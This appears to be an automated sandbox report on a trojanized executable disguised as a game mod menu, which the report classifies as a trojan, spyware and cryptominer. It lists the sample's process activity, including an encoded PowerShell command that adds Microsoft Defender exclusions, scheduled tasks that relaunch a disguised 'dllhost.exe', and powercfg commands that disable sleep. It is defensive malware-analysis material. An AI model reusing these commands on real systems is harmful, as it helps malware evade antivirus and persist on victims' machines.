                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 2_2_00A0AEE02_2_00A0AEE0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 2_2_009D76C02_2_009D76C0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 2_2_009FAEC02_2_009FAEC0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 2_2_009CB6F02_2_009CB6F0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 2_2_009E66F02_2_009E66F0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 2_2_009FD6E02_2_009FD6E0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 2_2_009F86E02_2_009F86E0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 2_2_009CC6102_2_009CC610
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 2_2_009E0E102_2_009E0E10
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 2_2_00A27E102_2_00A27E10
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 2_2_009D06202_2_009D0620
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 2_2_009EFE202_2_009EFE20
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 2_2_00A29E602_2_00A29E60
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 2_2_00A246402_2_00A24640
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 2_2_00A096502_2_00A09650
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 2_2_009CDE602_2_009CDE60
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 2_2_00A06F902_2_00A06F90
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 2_2_00A1FF902_2_00A1FF90
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 2_2_00A107F02_2_00A107F0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 2_2_009E6FC02_2_009E6FC0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 2_2_00A12FC02_2_00A12FC0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 2_2_009C27E02_2_009C27E0
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 2_2_009CBF102_2_009CBF10
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 2_2_009E2F102_2_009E2F10
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 2_2_009CA7002_2_009CA700
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 2_2_00A437182_2_00A43718
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 2_2_009D3F202_2_009D3F20
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 2_2_009E1F502_2_009E1F50
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 2_2_009D97402_2_009D9740
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeCode function: 14_2_00D8F2E414_2_00D8F2E4
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_049DB57017_2_049DB570
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_049DB55017_2_049DB550
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_089C3EB017_2_089C3EB0
                  Source: Joe Sandbox ViewDropped File: C:\ProgramData\Dllhost\WinRing0x64.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exe 483B1D7DAC70DE82E9B22A0C1ED775CF7E10B0A3790C5AA1B9215DBCD1754302
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: String function: 00A3607C appears 44 times
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: String function: 00A3AE24 appears 34 times
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: String function: 0041AFF0 appears 117 times
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: String function: 0040B380 appears 45 times
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: String function: 00A2DE10 appears 96 times
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7640 -s 404
                  Source: Kiddion's Modest Menu v.1.0.0.exeStatic PE information: invalid certificate
                  Source: winlogson.exe.14.drStatic PE information: Number of sections : 11 > 10
                  Source: winlogson.exe.14.drStatic PE information: No import functions for PE file found
                  Source: winlogson.exe.14.drStatic PE information: Data appended to the last section found
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.2016824681.0000000001665000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTask32Main.exe@ vs Kiddion's Modest Menu v.1.0.0.exe
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.2016929516.000000000161A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTask32Main.exe@ vs Kiddion's Modest Menu v.1.0.0.exe
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.2017495532.0000000001604000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTask32Main.exe@ vs Kiddion's Modest Menu v.1.0.0.exe
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000002.2394339673.000000000161D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTask32Main.exe@ vs Kiddion's Modest Menu v.1.0.0.exe
                  Source: Kiddion's Modest Menu v.1.0.0.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: Kiddion's Modest Menu v.1.0.0.exeStatic PE information: Section: .bss ZLIB complexity 1.0003319215238764
                  Source: Kiddion's Modest Menu v.1.0.0.exeStatic PE information: Section: .bss ZLIB complexity 1.0003319215238764
                  Source: WinRing0x64.sys.14.drBinary string: \Device\WinRing0_1_2_0
                  Source: 1C2NX3IUVJPXMLDGP.exe, 0000000E.00000002.1486956523.0000000000B9A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tem3:\Wi\Mic;.VBPRO432=AMD6!
                  Source: classification engineClassification label: mal100.troj.spyw.evad.mine.winEXE@33/17@4/4
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeCode function: 2_2_00444EA0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,2_2_00444EA0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7640
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7648:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5692:120:WilError_03
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeMutant created: \Sessions\1\BaseNamedObjects\ProgramV3
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7456:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1228:120:WilError_03
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile created: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeJump to behavior
                  Source: Kiddion's Modest Menu v.1.0.0.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1165637089.0000000003C25000.00000004.00000800.00020000.00000000.sdmp, Kiddion's Modest Menu v.1.0.0.exe, 00000002.00000003.1165821679.0000000001662000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: Kiddion's Modest Menu v.1.0.0.exeVirustotal: Detection: 69%
                  Source: Kiddion's Modest Menu v.1.0.0.exeReversingLabs: Detection: 65%
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeFile read: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exe "C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exe"
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeProcess created: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exe "C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exe"
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7640 -s 404
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeProcess created: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exe "C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exe"
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C powershell -EncodedCommand "PAAjAEIAQQBtAHcAUwBsAGkAMABzACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAVgBDAGoAaQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBSADgAWgA5ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAFcATQB1ADAAdABEAEEAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjAEIAQQBtAHcAUwBsAGkAMABzACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAVgBDAGoAaQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBSADgAWgA5ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAFcATQB1ADAAdABEAEEAIwA+AA=="
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-dc 0
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-ac 0
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-dc 0
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /hibernate off
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk5846" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk5846" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeProcess created: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exe "C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeProcess created: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exe "C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C powershell -EncodedCommand "PAAjAEIAQQBtAHcAUwBsAGkAMABzACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAVgBDAGoAaQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBSADgAWgA5ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAFcATQB1ADAAdABEAEEAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate offJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk5846" /TR "C:\ProgramData\Dllhost\dllhost.exe"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjAEIAQQBtAHcAUwBsAGkAMABzACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAVgBDAGoAaQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBSADgAWgA5ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAFcATQB1ADAAdABEAEEAIwA+AA==" Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-dc 0Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-ac 0Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-dc 0Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /hibernate offJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk5846" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\Kiddion's Modest Menu v.1.0.0.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1C2NX3IUVJPXMLDGP.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
